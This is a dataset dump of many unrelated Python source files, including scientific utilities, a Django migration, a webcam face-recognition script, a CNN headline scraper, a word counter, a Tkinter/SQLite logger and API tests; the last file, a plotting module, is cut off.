text stringlengths 8 6.05M |
|---|
class Person(object):
    """A node in a circular doubly-linked ring of people (Josephus game)."""

    def __init__(self, count):
        # Position of this person in the ring.
        self.count = count
        self.prev = None
        self.next = None

    def shout(self, shout, deadif):
        """Shout the running count; on reaching *deadif*, leave the ring.

        Returns the next count to shout (count + 1 while alive, reset to 1
        after this person has been spliced out of the ring).
        """
        if shout < deadif:
            return shout + 1
        # Eliminated: unlink self from the doubly-linked ring.
        self.prev.next = self.next
        self.next.prev = self.prev
        return 1
class Chain(object):
    """A circular chain of Person nodes supporting nth-person elimination."""

    def __init__(self, size):
        """Build a closed ring of *size* Person nodes numbered 0..size-1."""
        self.first = None
        last = None
        for idx in range(size):
            current = Person(idx)
            if self.first is None:
                self.first = current
            if last is not None:
                # Append behind the previously created node.
                last.next = current
                current.prev = last
            last = current
        # Close the ring: first <-> last.
        self.first.prev = last
        last.next = self.first

    def kill(self, nth):
        """Eliminate every nth person until one remains; return the survivor."""
        current = self.first
        shout = 1
        while current.next is not current:
            shout = current.shout(shout, nth)
            current = current.next
        self.first = current
        return current
import time

# Benchmark: build a 40-person ring and run the Josephus elimination
# (kill every 3rd) ITER times, then report the mean wall time per iteration.
ITER = 100000
start = time.time()
for i in range(ITER):
    chain = Chain(40)
    chain.kill(3)
end = time.time()
print('Time per iteration = %s microseconds ' % ((end - start) * 1000000 / ITER))
"""
MIT License
Copyright (c) 2018 Simon Raschke
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy as np
class clustersize_histogram(object):
    """Build a size-weighted, normalized histogram of cluster sizes.

    ``data`` maps a time key to a dict that must contain a "clusters"
    mapping whose values are cluster sizes.
    """

    def __init__(self):
        return

    def calculate(self, data, time_range=None):
        """
        data : dict of data. key "clusters" must be present
        time_range : optional pair; only keys within [min, max] are kept.

        Returns (hist, bins) from numpy.histogram with integer bins
        1..max(size)+1, weighted by cluster size and density-normalized.
        """
        self.data = {}
        if time_range is None:
            for key in data.keys():
                self.data[key] = data[key]["clusters"].values()
        else:
            lo, hi = min(time_range), max(time_range)
            for key in data.keys():
                # BUG FIX: the original `key >= min(time_range) <= max(time_range)`
                # chained to `key >= lo and lo <= hi`, so the upper bound was
                # never applied and every key >= lo was accepted.
                if lo <= key <= hi:
                    self.data[key] = data[key]["clusters"].values()
        values = []
        for vs in self.data.values():
            values.extend(vs)
        self.accumulated_values = values
        hist, bins = np.histogram(np.array(values),
                                  bins=np.arange(1, max(values) + 2),
                                  weights=np.array(values),
                                  density=True)
        return hist, bins
class inner_energy_plot(object):
    """Collect inner-energy values per timepoint for plotting."""

    def __init__(self):
        return

    def calculate(self, data, time_range=None):
        """Return (sorted timepoints, inner-energy values per timepoint).

        When ``time_range`` is given, only keys within [min, max] are used.
        """
        if time_range is None:
            # NOTE(review): this branch expects data[t]["inner_energy"] to
            # already exist, while the filtered branch reads "innter_energy";
            # confirm the producer's key spelling.
            self.data = data
        else:
            self.data = {}
            lo, hi = min(time_range), max(time_range)
            for key in data.keys():
                # BUG FIX: the original `key >= min(time_range) <= max(time_range)`
                # ignored the upper bound (it chained to `key >= lo and lo <= hi`).
                if lo <= key <= hi:
                    self.data[key] = {}
                    # "innter_energy" looks like a typo for "inner_energy" but is
                    # kept to match the incoming data schema.
                    self.data[key]["inner_energy"] = data[key]["innter_energy"].values()
        timepoints = sorted(list(set(self.data.keys())))
        inner_energies = [self.data[t]["inner_energy"] for t in timepoints]
        return timepoints, inner_energies
import json
class pyFclusterEncoder(json.JSONEncoder):
    """JSON encoder handling generic iterables and numpy scalars/arrays."""

    def default(self, obj):
        # Any iterable (sets, generators, numpy arrays, dict views, ...)
        # serializes as a JSON array.
        try:
            it = iter(obj)
        except TypeError:
            pass
        else:
            return list(it)
        if isinstance(obj, np.ndarray):
            return obj.tolist()
        if isinstance(obj, np.int64):
            return int(obj)
        # Nothing matched: defer to the base class, which raises TypeError.
        return json.JSONEncoder.default(self, obj)
import os
class JSON(object):
    """Accumulates per-step snapshot data and (de)serializes it to a JSON
    file, round-tripping dict keys (int <-> str) and lists <-> numpy arrays."""

    def __init__(self):
        # data maps step -> {"data": snapshot, **parameters}
        self.data = {}
        return

    def add_data(self, step, parameters, snapshot):
        """Store `snapshot` under `step` and merge `parameters` alongside it."""
        self.data.update({step: {"data": snapshot}})
        self.data[step].update(parameters)
        return self

    def write_to_file(self, filename):
        """Serialize all collected data to `filename` via pyFclusterEncoder."""
        for key, val in self.data.items():
            for nested_key, nested_val in self.data[key].items():
                if hasattr(nested_val, 'keys'):
                    # converting nested dict keys to string (JSON object keys
                    # must be strings)
                    self.data[key][nested_key] = {str(k): v for k, v in self.data[key][nested_key].items()}
        with open(filename, 'w') as FILE:
            json.dump(self.data, FILE, cls=pyFclusterEncoder)
        return self

    def read_from_file(self, filepath):
        """Load `filepath` and undo the stringification done on write.

        NOTE(review): top-level values are assumed to be dicts; if a
        top-level value were a list (converted to np.array below) or an int,
        the `.keys()` loop would raise — confirm the expected file layout.
        """
        assert (os.path.exists(filepath))
        with open(filepath) as FILE:
            self.data = json.load(FILE)
        # converting all the strings back to int and the lists back to np.arrays
        self.data = {int(k): v for k, v in self.data.items()}
        for key in self.data.keys():
            if isinstance(self.data[key], list):
                self.data[key] = np.array(self.data[key])
            if isinstance(self.data[key], str):
                try:
                    self.data[key] = int(self.data[key])
                except:
                    pass
            for nkey in self.data[key].keys():
                if isinstance(self.data[key][nkey], list):
                    self.data[key][nkey] = np.array(self.data[key][nkey])
                if isinstance(self.data[key][nkey], str):
                    try:
                        self.data[key][nkey] = int(self.data[key][nkey])
                    except:
                        pass
                if hasattr(self.data[key][nkey], 'keys'):
                    # Nested dict: restore integer keys.
                    self.data[key][nkey] = {int(k): v for k, v in self.data[key][nkey].items()}
        return self
import cv2
import pprint as pp
class Video(object):
    """Render boolean per-cell snapshot data to a video file via OpenCV."""

    def __init__(self, outname="system.avi"):
        # Split "name.format"; assumes outname contains exactly one '.'.
        self.name = outname.split('.')[0]
        self.format = outname.split('.')[1]
        self.output_complete = outname

    def render(self, data):
        """Write one video frame per step in `data`.

        data: step -> {"data": flat occupancy sequence}; occupied cells are
        drawn white, empty cells black.
        NOTE(review): if the first frame's width exceeds 900 (or width <
        height), scaling_factor stays None and the int(i*scaling_factor)
        expressions below raise TypeError — confirm the intended input sizes.
        """
        # Shape is taken from an arbitrary step (set ordering is arbitrary).
        the_data = np.array(data[list(set(data.keys()))[0]]["data"])
        width, height = the_data.shape if len(the_data.shape) > 1 else (the_data.shape[0], 1)
        scaling_factor = None
        print(width, height)
        if width >= height and width <= 900:
            # Upscale so the longest edge approaches 900 px.
            scaling_factor = np.floor(900.0 / width)
            width *= scaling_factor
            height *= scaling_factor
        writer = cv2.VideoWriter(self.output_complete, cv2.VideoWriter_fourcc(*"x264"), 30, (int(width), int(height)))
        for key in sorted(list(set(data.keys()))):
            converted_frame = np.ndarray(shape=(int(width), int(height), 3), dtype=np.uint8)
            for i in range(len(data[key]["data"])):
                is_occupied = bool(data[key]["data"][i])
                # Paint a scaling_factor-sized block per cell.
                if is_occupied:
                    converted_frame[int(i*scaling_factor):int(i*scaling_factor+scaling_factor), 0:int(scaling_factor), :] = 255
                else:
                    converted_frame[int(i*scaling_factor):int(i*scaling_factor+scaling_factor), 0:int(scaling_factor), :] = 0
            # pp.pprint(converted_frame.astype('uint8'))
            # pp.pprint(np.random.randint(0, 255, (480,640,3)).astype('uint8'))
            writer.write(converted_frame.astype('uint8'))
        writer.release()
# Generated by Django 2.2 on 2019-03-13 15:48
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated Django migration: rename model `newuser` to `newuserModel`."""

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('wikiApp', '0002_auto_20190313_1524'),
    ]

    operations = [
        migrations.RenameModel(
            old_name='newuser',
            new_name='newuserModel',
        ),
    ]
|
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 5 16:02:10 2018
@author: Josh Jones
"""
# The following details a DNA sequence and its various complements
seq = input("Enter a DNA sequence consisting of A's, T's, G's, or C's: ")
seq = seq.upper()
# Replace every character that is not a valid base with '-'.
# (The loop iterates the original string object, so rebinding `seq`
# inside the body is safe.)
for letter in seq:
    if letter != 'A' and letter != 'T' and letter != 'G' and letter != 'C':
        seq = seq.replace(letter, '-')
# Print the length and original sequence
print("Length of Sequence:", len(seq))
print("Original DNA Sequence: 5`-", seq, "-3`")
# Take and print the complement
complement = []
# Base-pairing table; '-' (invalid base placeholder) maps to itself.
seq_complement = {'A':'T', 'T':'A', 'G':'C', 'C':'G', '-':'-'}
for letter in seq:
    complement.append(seq_complement[letter])
print("Complement Sequence: 3`-", ''.join(complement), "-5`")
# Take and print the reverse
l = list(seq)
l.reverse()
seq = ''.join(l)
print("Reverse Sequence: 3`-", seq, "-5`")
# Reverse the complement and print
l = list(complement)
l.reverse()
print("Reverse Complement: 5`-", ''.join(l), "-3`")
|
# -*- coding: UTF-8 -*-
import os,dlib,glob,numpy
from skimage import io
import cv2
import imutils
'''
if len(sys.argv) != 2:
print("缺少要辨識的圖片名稱")
exit()
'''
# Path to the 68-point facial landmark model
predictor_path = "shape_predictor_68_face_landmarks.dat"
# Path to the face recognition model
face_rec_model_path = "dlib_face_recognition_resnet_model_v1.dat"
# Folder of reference face images to compare against
faces_folder_path = "./rec"
# Name of the face image to identify (disabled: webcam frames are used instead)
#img_path = sys.argv[ 1]
# Load the frontal face detector
detector = dlib.get_frontal_face_detector()
# Load the facial landmark predictor
sp = dlib.shape_predictor(predictor_path)
# Load the face recognition model
facerec = dlib.face_recognition_model_v1(face_rec_model_path)
# Face descriptors of the known reference images
descriptors = []
# Candidate names matching `descriptors` by index
candidate = []
# For every image in the reference folder:
# 1. detect faces
# 2. detect landmarks
# 3. compute the descriptor
def reg():
    """Scan faces_folder_path for *.jpg reference images; append each face's
    128-d descriptor to `descriptors` and the file's base name to `candidate`."""
    for f in glob.glob(os.path.join(faces_folder_path, "*.jpg")):
        base = os.path.basename(f)
        # The file name (without extension) is the person's name
        candidate.append(os.path.splitext(base)[ 0])
        img = io.imread(f)
        # 1. face detection
        dets = detector(img, 1)
        for k, d in enumerate(dets):
            # 2. landmark detection
            shape = sp(img, d)
            # 3. compute the descriptor: a 128-d feature vector
            face_descriptor = facerec.compute_face_descriptor(img, shape)
            # convert to a numpy array
            v = numpy.array(face_descriptor)
            descriptors.append(v)
# Learn all reference faces before starting the webcam loop.
reg()
# Open the first camera
cap = cv2.VideoCapture(0)
# Set the default frame size
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
while True:
    ret, frame = cap.read()
    cv2.imshow("Face Recognition", frame)
    #img = io.imread(img_path)
    dets = detector(frame, 1)
    dist = []
    for k, d in enumerate(dets):
        # Distances from this face to every known descriptor.
        dist=[]
        shape = sp(frame, d)
        face_descriptor = facerec.compute_face_descriptor(frame, shape)
        d_test = numpy.array(face_descriptor)
        x1 = d.left()
        y1 = d.top()
        x2 = d.right()
        y2 = d.bottom()
        frame2 = frame.copy()
        # Mark the detected face with a rectangle
        cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0), 2, cv2.LINE_AA)
        # Compute the Euclidean distance to each reference descriptor
        for i in descriptors:
            dist_ = numpy.linalg.norm(i - d_test)
            dist.append(dist_)
        # Zip candidate names with their distances into a dict
        c_d = dict(zip(candidate, dist))
        # Sort by Euclidean distance, smallest first
        cd_sorted = sorted(c_d.items(), key=lambda d: d[1])
        print(cd_sorted)
        if cd_sorted[0][1] > 0.5:
            # Unknown face: ask for a name, save the crop, re-learn references
            name = input("請輸入人名")
            frame2 = imutils.resize(frame2, width=600)
            cv2.imwrite("rec\\" + name + ".jpg", frame2)
            reg()
        else:
            # The smallest distance identifies the recognized person
            rec_name = cd_sorted[0][0]
            # Draw the recognized name onto the frame
            cv2.putText(frame, rec_name, (x1, y1), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)
    frame = imutils.resize(frame, width=600)
    cv2.imshow("Face Recognition", frame)
    # Press Esc (27) to quit
    if cv2.waitKey(1) == 27:
        cap.release()
        cv2.destroyAllWindows()
        break
#!/usr/bin/env python
import yaml
import argparse
import numpy as np
class Lammps2ForceSets:
    """Convert LAMMPS force dump files into a phonopy FORCE_SETS file."""

    def __init__(self,
                 forces_filenames,
                 disp_filename="disp.yaml"):
        # One LAMMPS dump file per displacement, in the same order as the
        # "displacements" entries of disp.yaml.
        self._forces_filenames = forces_filenames
        self._disp_filename = disp_filename

    def run(self):
        """Read displacements, gather forces, then write FORCE_SETS."""
        self.read_disp_yaml()
        self.create_force_sets()
        self.write_force_sets()

    def read_disp_yaml(self):
        """Load the displacement definition (disp.yaml or phonopy_disp.yaml)."""
        with open(self._disp_filename, "r") as f:
            d = yaml.safe_load(f)
        if 'natom' not in d:  # phonopy_disp.yaml
            # phonopy_disp.yaml lacks 'natom'; derive it from the supercell.
            d['natom'] = len(d['supercell']['points'])
        self._disp_data = d

    def create_force_sets(self):
        """Read one (natom, 3) force array per dump into self._force_sets."""
        force_sets = []
        for forces_filename in self._forces_filenames:
            print("forces_filename:", forces_filename)
            forces = self._read_forces_from_lammps(forces_filename)
            force_sets.append(forces)
        force_sets = np.array(force_sets)
        self._force_sets = force_sets

    def _read_forces_from_lammps(self, filename):
        """Parse a LAMMPS dump: read the atom count, then the force columns.

        Only the last three whitespace-separated columns of each atom line
        (fx fy fz) are used. Returns a numpy array of shape (natom, 3).
        """
        forces = []
        with open(filename, "r") as f:
            for line in f:
                if "ITEM: NUMBER OF ATOMS" in line:
                    line2 = next(f)
                    natom = int(line2.split()[0])
                elif "fx fy fz" in line:
                    for _ in range(natom):
                        line2 = next(f)
                        forces.append([float(x) for x in line2.split()[-3:]])
                    # Only the first force block of the dump is read.
                    break
        forces = np.array(forces)
        return forces

    def write_force_sets(self):
        """Emit FORCE_SETS in phonopy's plain-text format."""
        disp_data = self._disp_data
        with open("FORCE_SETS", "w") as f:
            f.write("{}\n".format(disp_data["natom"]))
            f.write("{}\n".format(len(disp_data["displacements"])))
            for i, d in enumerate(disp_data["displacements"]):
                forces = self._force_sets[i]
                f.write("\n")
                f.write("{}\n".format(d["atom"]))
                # NOTE: the inner loops rebind `i`; harmless because the outer
                # `i` is only read before they run.
                for i in range(3):
                    f.write(" {:20.16f}".format(d["displacement"][i]))
                f.write("\n")
                for force in forces:
                    for i in range(3):
                        f.write(" {:16.10f}".format(force[i]))
                    f.write("\n")
def main():
    """CLI entry point: convert LAMMPS force dumps into a phonopy FORCE_SETS."""
    parser = argparse.ArgumentParser()
    parser.add_argument("-d", "--disp_yaml",
                        default="disp.yaml",
                        type=str,
                        help="disp.yaml filename.")
    parser.add_argument("-f", "--forces",
                        nargs="+",
                        type=str,
                        help="LAMMPS dump files including forces.")
    args = parser.parse_args()
    converter = Lammps2ForceSets(
        forces_filenames=args.forces,
        disp_filename=args.disp_yaml,
    )
    converter.run()


if __name__ == "__main__":
    main()
|
from django.contrib import admin
from .models import Channel, Project, Tag, Profile
# Register your models here.
# Expose the content models in the Django admin with default ModelAdmin options.
admin.site.register([Channel, Project, Tag, Profile])
|
from selenium import webdriver
from bs4 import BeautifulSoup
import singleNewsCrawler
import MySQLdb
import configparser
class CNNScrapper:
    """Crawl cnn.com (home, politics, US sections) for Trump-related
    headlines, scrape each matching article, and store the results in MySQL."""

    def __init__(self):
        '''
        params:
        database credentials. Fill up the config.ini according to your credentials
        '''
        # NOTE(review): PhantomJS support is deprecated in recent Selenium
        # releases — confirm the pinned selenium version.
        self.driver=webdriver.PhantomJS('/phantomjs')
        self.rooturl='https://www.cnn.com/' #entry point
        self.trumpUrls=[]  # de-duplicated article URLs mentioning Trump
        self.newsContents=[]  # scraped article payloads (title/summary/description/url)
        config = configparser.ConfigParser()
        config.read("config.ini")
        self.host=config.get('CREDENTIALS','host')
        self.uname=config.get('CREDENTIALS','username')
        self.pwd=config.get('CREDENTIALS','password')
        self.dbName=config.get('CREDENTIALS','database')
        self.priorityIndex=0
        self.singleNewsScrapper=singleNewsCrawler.singleCNNNews()

    def postInDB(self): #this function updates the news in the database
        """Replace the cnnTop25News table contents with the scraped articles."""
        conn=MySQLdb.connect(self.host,self.uname,self.pwd,self.dbName,charset="utf8")
        c=conn.cursor()
        c.execute('TRUNCATE table cnnTop25News')
        # NOTE(review): the slice keeps 24 items although the table is named
        # cnnTop25News — confirm the intended count.
        if(len(self.newsContents)>30):
            self.newsContents=self.newsContents[:24]
        print(len(self.newsContents))
        for i in range(len(self.newsContents)):
            c.execute('INSERT into cnnTop25News (title,dsc,long_dsc,postUri) VALUES (%s,%s,%s,%s);',(self.newsContents[i]['title'],self.newsContents[i]['summary'],self.newsContents[i]['description'],self.newsContents[i]['url']))
        conn.commit()
        conn.close()

    def crawl(self): #main crawler function
        """Visit home/politics/US pages, collect matching URLs, scrape every
        article, then persist via postInDB(). Aborts silently on driver errors."""
        #crawl homepage
        try:
            self.driver.get(self.rooturl)
            self.driver.execute_script("window.scrollTo(0, 2000);") #automated scroll down
        except:
            return
        source=self.driver.page_source
        self.crawlHomepage(source)
        #crawl politics
        try:
            self.driver.get(self.rooturl+'politics')#Politics category
            self.driver.execute_script("window.scrollTo(0, 2000);")#automated scroll down
        except:
            return
        source=self.driver.page_source
        self.crawlPolitics(source)
        #crawl us
        try:
            self.driver.get(self.rooturl+'us')#US Category
            self.driver.execute_script("window.scrollTo(0, 2000);")#automated scroll down
        except:
            return
        source=self.driver.page_source
        self.crawlUS(source)
        #now get all the title and description
        for i in range(len(self.trumpUrls)):
            data=self.singleNewsScrapper.getContents(self.trumpUrls[i]) #Getting the contents from each news URLs
            if (data=='Error'):
                continue
            else:
                self.newsContents.append(data)
        self.postInDB()

    def crawlUS(self,source): #function to get all news URLs that contains Donald Trump (not Melania or Ivanka) in the US section
        # NOTE(review): identical to crawlPolitics — a shared helper would
        # remove the duplication.
        polSoup=BeautifulSoup(source,'lxml')
        headlines=polSoup.find_all('h3',class_='cd__headline')
        for i in range(len(headlines)):
            spn=str(headlines[i].contents)
            soup2=BeautifulSoup(spn,'lxml')
            hdln=soup2.find('span',class_='cd__headline-text')
            if(hdln.text.lower().find('trump')>-1) and not (hdln.text.lower().find('ivanka')>-1) and not (hdln.text.lower().find('melania')>-1):
                urlDOM=soup2.find('a')
                # data={'headline':hdln.text,'url':self.rooturl+urlDOM['href']}
                self.trumpUrls.append(self.rooturl+urlDOM['href'][1:])
        # Drop duplicate URLs collected across sections.
        self.trumpUrls=list(set(self.trumpUrls))
        print(len(self.trumpUrls))

    def crawlPolitics(self,source):#function to get all news URLs that contains Donald Trump (not Melania or Ivanka) in the politics section
        polSoup=BeautifulSoup(source,'lxml')
        headlines=polSoup.find_all('h3',class_='cd__headline')
        for i in range(len(headlines)):
            spn=str(headlines[i].contents)
            soup2=BeautifulSoup(spn,'lxml')
            hdln=soup2.find('span',class_='cd__headline-text')
            if(hdln.text.lower().find('trump')>-1) and not (hdln.text.lower().find('ivanka')>-1) and not (hdln.text.lower().find('melania')>-1):
                urlDOM=soup2.find('a')
                # data={'headline':hdln.text,'url':self.rooturl+urlDOM['href']}
                self.trumpUrls.append(self.rooturl+urlDOM['href'][1:])
        self.trumpUrls=list(set(self.trumpUrls))
        print(len(self.trumpUrls))

    def crawlHomepage(self,source):#function to get all news URLs that contains Donald Trump (not Melania or Ivanka) in the home page
        homeSoup=BeautifulSoup(source,'lxml')
        headlines=homeSoup.find_all('h3',class_='cd__headline')
        #check if the headline contains about Trump
        for i in range(len(headlines)):
            spn=str(headlines[i].contents)
            soup2=BeautifulSoup(spn,'lxml')
            hdln=soup2.find('span')
            if(hdln.text.lower().find('trump')>-1) and not (hdln.text.lower().find('ivanka')>-1) and not (hdln.text.lower().find('melania')>-1):
                # print(hdln.text)
                urlDOM=soup2.find('a')
                # data={'headline':hdln.text,'url':self.rooturl+urlDOM['href']}
                self.trumpUrls.append(self.rooturl+urlDOM['href'][1:])
        self.trumpUrls=list(set(self.trumpUrls))
        print(len(self.trumpUrls))
def main():
    """Build a scraper instance and run one full crawl."""
    scraper = CNNScrapper()
    scraper.crawl()


if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
"""
Created on June 10 20:54:27 2018
@author: Victor
"""
import argparse
import multiprocessing
import os
import re
import time
from collections import Counter
from multiprocessing import Pool
# Regex matching the separator characters stripped before counting words.
# BUG FIX: the original pattern was built in a non-raw string, so '\\|'
# collapsed to the escaped pipe '\|' — the backslash itself and ';' were
# never matched correctly. A raw-string character class covers exactly
# the intended set: ? . ! / \ ; : ` _ ,
whitechars = r'[?.!/\\;:`_,]'
# Common short words excluded from the frequency count.
stopwords={"did", "out", "got", "her", "were", "the", "and", "was", "that", "his", "you", "with", "they", "for", "had", "this", "but", "there", "then", "him", "not", "are", "them", "into", "she"}
def process_files(filelist):
    """
    read content of each file from list into string,
    clean white chars, then split and count words

    Returns a dict mapping word -> occurrence count. Words of fewer than
    three characters and stopwords are skipped.
    """
    dic_local = {}
    for file in filelist:
        # BUG FIX: use a context manager so every file handle is closed
        # (the original leaked one open handle per file).
        with open(file, 'r') as document:
            text_string = document.read().lower()
        text_string = re.sub(whitechars, '', text_string)
        for word in text_string.split():
            if len(word) > 2 and word not in stopwords:
                dic_local[word] = dic_local.get(word, 0) + 1
    return dic_local
def build_fileslist(pathlist):
    """
    build flat list of files

    Non-existent paths are skipped; directories are walked recursively.
    """
    collected = []
    for path in pathlist:
        if not os.path.exists(path):
            continue
        if os.path.isfile(path):
            collected.append(path)
        else:
            # Directory: gather every file underneath it.
            for root, _dirs, names in os.walk(path):
                collected.extend(os.path.join(root, n) for n in names)
    return collected
def compute_data(workers_data, nwords):
    """
    combine data produced by workers and sort

    Prints the `nwords` most frequent words, one per line.
    BUG FIX: the original aliased workers_data[0] and mutated the caller's
    dict while combining; a Counter now accumulates into a fresh mapping.
    """
    combined = Counter()
    for partial in workers_data:
        combined.update(partial)
    # most_common sorts by count descending (ties keep insertion order),
    # matching the original sorted(..., reverse=True) output.
    for word, count in combined.most_common(nwords):
        print("word '%s' occured '%d' times" % (word, count))
def generate_workers_input(files, workers_num):
    """Split `files` into workers_num contiguous buckets.

    Bucket size is the ceiling of len(files)/workers_num, so trailing
    buckets may be shorter (or empty)."""
    bucket = -(-len(files) // workers_num)  # ceiling division
    return [files[i * bucket:(i + 1) * bucket] for i in range(workers_num)]
def main():
    """Parse CLI args, fan file batches out to a process pool, and report
    the N most frequent words plus the elapsed wall time."""
    parser = argparse.ArgumentParser(
        description='Display N most frequent words in provided files')
    parser.add_argument('count', type=int, metavar='N', help='number of most frequent words')
    parser.add_argument('files', type=str, nargs='+', help='list of files/dirs to scan')
    args = parser.parse_args()
    files = build_fileslist(args.files)
    if len(files):
        startTime = time.time()
        # One bucket of files per CPU core.
        workers_num = multiprocessing.cpu_count()
        worker_input = generate_workers_input(files, workers_num)
        pool = Pool(processes=workers_num)
        workers_data = pool.map(process_files, worker_input)
        compute_data(workers_data, args.count)
        endTime = time.time()
        print ("The job took " + str(endTime - startTime) + " seconds to complete")
    else:
        print("no single valid path exists, please provide at least one")
        parser.print_help()

if __name__ == '__main__':
    main()
import sqlite3
from Tkinter import *
# Open (or create) the local SQLite database and a shared cursor.
db = sqlite3.connect('NDI.db')
cur = db.cursor()
def add():
    """Interactively append task rows to the pt/mt/et/ut tables.

    NOTE: uses raw_input, i.e. this script targets Python 2.
    """
    db.execute("create table if not exists pt (date text,task text,hrs int,remarks text)")
    db.execute("create table if not exists mt (date text,task text,hrs int,remarks text)")
    db.execute("create table if not exists et (date text,task text,hrs int,remarks text)")
    db.execute("create table if not exists ut (date text,task text,hrs int,remarks text)")
    add = raw_input("add more(y/n): ")
    while add == "y":
        method = raw_input("method(mt/pt/et/ut: ")
        date = raw_input("date: ")
        task = raw_input("task: ")
        hrs = raw_input("hrs: ")
        remarks = raw_input("remarks: ")
        # NOTE(review): the table name is concatenated into the SQL; values
        # are parameterized, but `method` should be validated against the
        # four known table names.
        db.execute("insert into " + method +" (date, task, hrs, remarks) values(?, ?, ?, ?)", (date, task, hrs, remarks))
        add = raw_input("add more(y/n): ")
    db.commit()
def select():
    """Print every row of the pt table."""
    cur.execute("select * from pt")
    print(cur.fetchall())
def gui():
    """Build the main window with one radio button per table, then run Tk."""
    # window
    root = Tk()
    v = StringVar()
    # modify root window
    root.title("NDI Database")
    root.geometry("1000x500")
    app = Frame(root)
    app.grid()
    #Label(root, text = "Choose a Method",).pack(anchor = W)
    # One radio button per inspection-method table; selection lands in `v`.
    Radiobutton(root,
                text = "mt",
                variable = v,
                value = "mt").pack(side = LEFT, anchor = W)
    Radiobutton(root,
                text = "et",
                variable = v,
                value = "et").pack(side = LEFT, anchor = W)
    Radiobutton(root,
                text = "ut",
                variable = v,
                value = "ut").pack(side = LEFT, anchor = W)
    Radiobutton(root,
                text = "pt",
                variable = v,
                value = "pt").pack(side = LEFT, anchor = W)
    # event loop
    root.mainloop()

#add()
#select()
gui()
from datarender.fieldset import (
FieldSet, HeaderSet, ColumnSet, FormFieldSet, DynamicFieldSet)
from datarender.fields import (
BaseField, Field, Header, FieldMapper,
FormField, BaseDateField, DateField, DateTimeField)
|
def cube(x):
    """Return the cube of *x*."""
    result = x ** 3
    return result
def fibonacci(n):
    """Return a list of the first *n* Fibonacci numbers, starting 0, 1, 1, ...

    IMPROVEMENT: the original recursed once per element, hitting Python's
    recursion limit for n around 1000; this iterative version is O(n) with
    constant stack depth and returns [] for n <= 0.
    """
    sequence = []
    a, b = 0, 1
    for _ in range(n):
        sequence.append(a)
        a, b = b, a + b
    return sequence
|
import re

# Read a text and a pattern, then print the (start, end) index pair of every
# (possibly overlapping) match, or (-1, -1) when there is none.
text = input()
target = input()
pattern = re.compile(target)
results = pattern.search(text)
if not results: print("(-1, -1)")
while results:
    # end() is exclusive, hence -1 to report the last matched index.
    print("({0}, {1})".format(results.start(), results.end()-1))
    # Resume one character past the previous start so overlapping matches
    # are found too.
    results = pattern.search(text, results.start()+1)
|
from unittest import TestCase
import lamdex
import requests
import mock
class Test_Lamdex(TestCase):
    """Tests for the lamdex rate/forex helpers.

    NOTE(review): several tests hit the live hitbtc API and will fail
    offline; the module-level `mock` import is unused here.
    """

    def test_return_rate_returns_1(self):
        # test=True short-circuits the live lookup and returns 1.
        self.assertEqual(lamdex.return_rate('EOS', test=True), 1)

    def test_return_rate_fails_in_non_supported_tokens(self):
        # NOTE(review): assertRaises would express this intent more directly
        # than the try/assertTrue(False) pattern.
        try:
            lamdex.return_rate('XXX')
            self.assertTrue(False)
        except Exception as e:
            print(e)
            self.assertTrue(True)

    def test_return_rate_is_accurate(self):
        # Compare against the live TAU/BTC ticker.
        url = 'https://api.hitbtc.com/api/2/public/ticker/TAUBTC'
        r = requests.get(url)
        last = float(r.json()['last'])
        self.assertEqual(lamdex.return_rate('TAU'), last)

    def test_forex_test_returns_1(self):
        self.assertEqual(lamdex.forex('TAU', 'EOS', test=True), 1)

    def test_forex_is_accurate(self):
        # Cross rate TAU/EOS derived from the two BTC tickers.
        url = 'https://api.hitbtc.com/api/2/public/ticker/TAUBTC'
        r = requests.get(url)
        last_tau = float(r.json()['last'])
        url = 'https://api.hitbtc.com/api/2/public/ticker/EOSBTC'
        r = requests.get(url)
        last_eos = float(r.json()['last'])
        test_forex = last_tau/last_eos
        self.assertEqual(lamdex.forex('TAU', 'EOS'), test_forex)
|
# Copyright (c) 2019-2020, RTE (https://www.rte-france.com)
# See AUTHORS.txt
# This Source Code Form is subject to the terms of the Apache License, version 2.0.
# If a copy of the Apache License, version 2.0 was not distributed with this file, you can obtain one at http://www.apache.org/licenses/LICENSE-2.0.
# SPDX-License-Identifier: Apache-2.0
# This file is part of hadar-simulator, a python adequacy library for everyone.
from typing import Dict, List, Tuple
import numpy as np
import pandas as pd
import plotly.graph_objects as go
from matplotlib.cm import coolwarm
from hadar.analyzer.result import ResultAnalyzer
from hadar.viewer.abc import ABCPlotting, ABCElementPlotting
__all__ = ["HTMLPlotting"]
class HTMLElementPlotting(ABCElementPlotting):
    """Element-level plot builders producing interactive plotly figures."""

    def __init__(
        self, unit: str, time_index, node_coord: Dict[str, List[float]] = None
    ):
        # Unit symbol appended to axis titles (e.g. "MW").
        self.unit = unit
        self.time_index = time_index
        # Optional node -> [lon, lat] mapping; required only for map plots.
        self.coord = node_coord

        self.cmap = coolwarm
        self.cmap_plotly = HTMLElementPlotting.matplotlib_to_plotly(self.cmap, 255)
        # Fixed color cycle for stacked consumption lines.
        self.cmap_cons = [
            "brown",
            "blue",
            "darkgoldenrod",
            "darkmagenta",
            "darkorange",
            "cadetblue",
            "forestgreen",
